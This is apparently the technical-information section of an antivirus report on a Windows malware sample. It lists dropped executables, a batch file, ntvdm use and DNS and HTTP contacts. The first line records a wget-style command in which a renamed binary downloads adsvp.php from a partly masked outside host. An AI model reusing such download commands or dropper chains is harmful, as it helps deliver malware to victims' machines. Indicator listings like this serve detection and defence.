Техническая информация
- <LS_APPDATA>\F8CF33AD986170E3D24561D4B8B8D76B.EXE -o F70130C44CDD00A372972E2323195E7A -d -t 0 --retry-connrefused -w 5 --random-wait --no-dns-cache --restrict-file-names=windows -nd -nH --no-cache --ignore-length --no-cookies --no-check-certificate --follow-ftp http://bt###cker.uk.to/affiliate/549683/adsvp.php
- %TEMP%\47helper.exe
- %TEMP%\install.exe r
- <SYSTEM32>\cmd.exe /c ""%WINDIR%\Temp\a00277.bat" "%TEMP%\\47helper.exe" "
- <SYSTEM32>\ntvdm.exe -f -i1
- <LS_APPDATA>\pcre3.dll
- <LS_APPDATA>\F8CF33AD986170E3D24561D4B8B8D76B.EXE
- <LS_APPDATA>\C907D7A30E7D43AFD00202154480A33A.EXE
- <LS_APPDATA>\adsvp.php
- <LS_APPDATA>\F70130C44CDD00A372972E2323195E7A
- %WINDIR%\Temp\a00277.bat
- <LS_APPDATA>\C0CA437737654CA667038D6B2C1B5D1E.EXE
- %WINDIR%\Temp\scs1.tmp
- %TEMP%\install.exe
- %TEMP%\359helper.exe
- %TEMP%\47helper.exe
- %TEMP%\115helper.exe
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\a00277.bat
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- 'bt###cker.uk.to':80
- bt###cker.uk.to/affiliate/549683/adsvp.php
- DNS ASK bt###cker.uk.to
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-9b8.9bc.370001'